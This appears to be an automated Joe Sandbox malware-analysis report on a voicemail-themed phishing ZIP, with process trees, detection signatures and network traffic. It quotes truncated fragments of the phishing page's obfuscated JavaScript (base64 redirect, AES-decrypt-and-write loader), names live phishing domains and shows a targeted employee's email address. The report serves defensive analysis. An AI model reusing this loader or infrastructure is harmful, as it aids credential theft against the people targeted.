Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
You_missed_a_VM _Transcription_Available_Play_Now.zip

Overview

General Information

Sample name:You_missed_a_VM _Transcription_Available_Play_Now.zip
Analysis ID:1489929
MD5:221f7e9438c2f8c1ba887734276da8b8
SHA1:3068c66307ea34c3368385b346c18b1d3853f649
SHA256:e8afbd2ef4b53ba9de32e9ba6193ebd4adbb160145d5c58c6ff5a0d7bbc19b67
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
Yara detected Phisher
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 3984 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 6936 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_You_missed_a_VM _Transcription_Available_Play_Now.zip\dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e\0487740a-25b6-b501-5a7a-7d2325a24229.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1092 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "43C5E950-F79A-4689-85C2-4010AE93AD34" "DFDF5C69-B937-45E0-AA89-6BE25B94BA15" "6936" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=1640,i,7162689418209009377,951733317594602738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_98JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_80JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      4.3.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
        4.4.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security

          Sigma Signatures

          Sigma detected: Office Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Yara detected HtmlPhish70
          Source: Yara matchFile source: 4.3.pages.csv, type: HTML
          Source: Yara matchFile source: 4.4.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_80, type: DROPPED
          Yara detected Phisher
          Source: Yara matchFile source: dropped/chromecache_98, type: DROPPED
          HTML page contains hidden URLs
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: https://sparkqueste.com.ru///3825.php
          HTML page contains hidden email address
          Source: https://kisswire.com/fthjx.phpHTTP Parser: karen.burch@vossloh.com
          HTML page contains suspicious javascript code
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: window.location.href = atob(
          Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
          Source: https://kisswire.com/fthjx.php?4-797967704b536932307466507a7370495430744a5338346f5338724b7938724f4166494b79347641794e5459784e5459314d6a59794e685572794178506256594c79573154423841-calypsoHTTP Parser: var range= document.createelement("script");range.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(range);range.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiwtqxwxmxyk92dzdnq0djb3rukzbtq0mwv0rivvc4nklcqmlpnujpvkvpvm5srvy2djjhckjxzmrhdfztuen4mgdnskndaxyyznbnzk51ude5n1vlb3pxalzfa3hhcwf2dvd2cujumnfsqxfaawlclzhzdzhyamtnzg1tdhlmyzjjtutknxlwcthyrldgqw4yrmm3bgjjtmfludrrnvd1cutlm01ozlfyvznmuvnrsnfbzmj5mtlnelfwa3pxyk4xr3vrdtbevfgzcfbzewixrlhvvgjcr2nkaxa3suyzcvwvk1pnutj1dwdjzw9svkpeqmteudlzuyt1twfjvvlmtgzcquc3tmnfcmhmyuvszwnhm2vlofrpnmf1ruvqbvbaugvqk29iytz5rhdlqxhtbgg4d3uwvhzzv1iwulrmvzbpaujyuxfxd0w0a2vzs3pnudkreu5ozkgzzkdzwvixa2nnoudnslnuykpsq0m5oun2oup2tgltmw5dwnnaz1dasuk5c2llxc9sow1gqw5hs2tqbhlvv3zsbkhhuw9tqtbhctrkqvhcym1jz3i4vkvkqwq3aks5vnzwdw80rudnbuzsehjkm0ttmjrjrwtsuhq1vxzrrhvjrtyrne1ybjjnzxa4wnjkmtlwbwrontlqyvbmemvzmgvevgjtqnrrs0fmcfdyuzvxte1qudb6rmlcl280vxmxdtjgullfrlfyxc9cl1phrlvcbkvjnjzanuvszlpprkurbmcxymvqcuezdxndnllmtmg...
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: async function packed(page) { <!-- <span>a cars beauty lies in the stories it tells.</span> --> var {a,b,c,d} = json.parse(page); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function cabinet() {jadedness.hidden = 0;yellow.hidden = 1; document.write(await packed(await (await fetch(await packed(atob(`eyjhijoiajiznek2dujpatzbk2n3t2rukzlmrgxgmhdsb2x6otrbownotni1tdzsaz0ilcjjijoiyjywyjg1mdq3zwm0zmvjnmeyotqzztazytcxnjvknjkilcjiijoiowy0ngu0ywi2ngy1zjg4mde5zdk1zjy5ytyyy2iwymq0zdbmzdflzdu2zji1ndu1m2rjymrmmtywn2njzjjlmgy0zgzimdbizmm3zdy2n2mzotewnjewmzhmnwzkmtq3nwq0zmnhzduznguzowrlyjrkyzy3mdg2ngniotm5yzixnzixmzdkmzuymdjjogq3nmu4mtjizwu3nzkxmjrly2qwytqwzdq1ztixyjzmmjc1zwq3yjdkmtewnwu1mzm2zmuwythmy2q2zwvmmzvmotnlyty4ztbjy2jindzhyzewztflmjmxnzgzmjg1odazyzdinmrjyzayodmzzjzhnmexogvlztg3ndrkotlm...
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: Number of links: 0
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: Total embedded image size: 45708
          Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htmHTTP Parser: Base64 decoded: karen.burch@vossloh.com
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: Title: abolitionist does not match URL
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: <input type="password" .../> found
          Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htmHTTP Parser: No favicon
          Source: https://kisswire.com/fthjx.phpHTTP Parser: No favicon
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: No favicon
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: No favicon
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: No favicon
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: No <meta name="author".. found
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49765 version: TLS 1.2
          Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: global trafficDNS traffic detected: DNS query: kisswire.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: sparkqueste.com.ru
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49765 version: TLS 1.2
          Source: classification engineClassification label: mal72.phis.winZIP@23/25@34/100
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240808T0604370209-6936.etl
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_You_missed_a_VM _Transcription_Available_Play_Now.zip\dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e\0487740a-25b6-b501-5a7a-7d2325a24229.eml"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "43C5E950-F79A-4689-85C2-4010AE93AD34" "DFDF5C69-B937-45E0-AA89-6BE25B94BA15" "6936" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh.htm
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=1640,i,7162689418209009377,951733317594602738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "43C5E950-F79A-4689-85C2-4010AE93AD34" "DFDF5C69-B937-45E0-AA89-6BE25B94BA15" "6936" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh.htm
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=1640,i,7162689418209009377,951733317594602738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
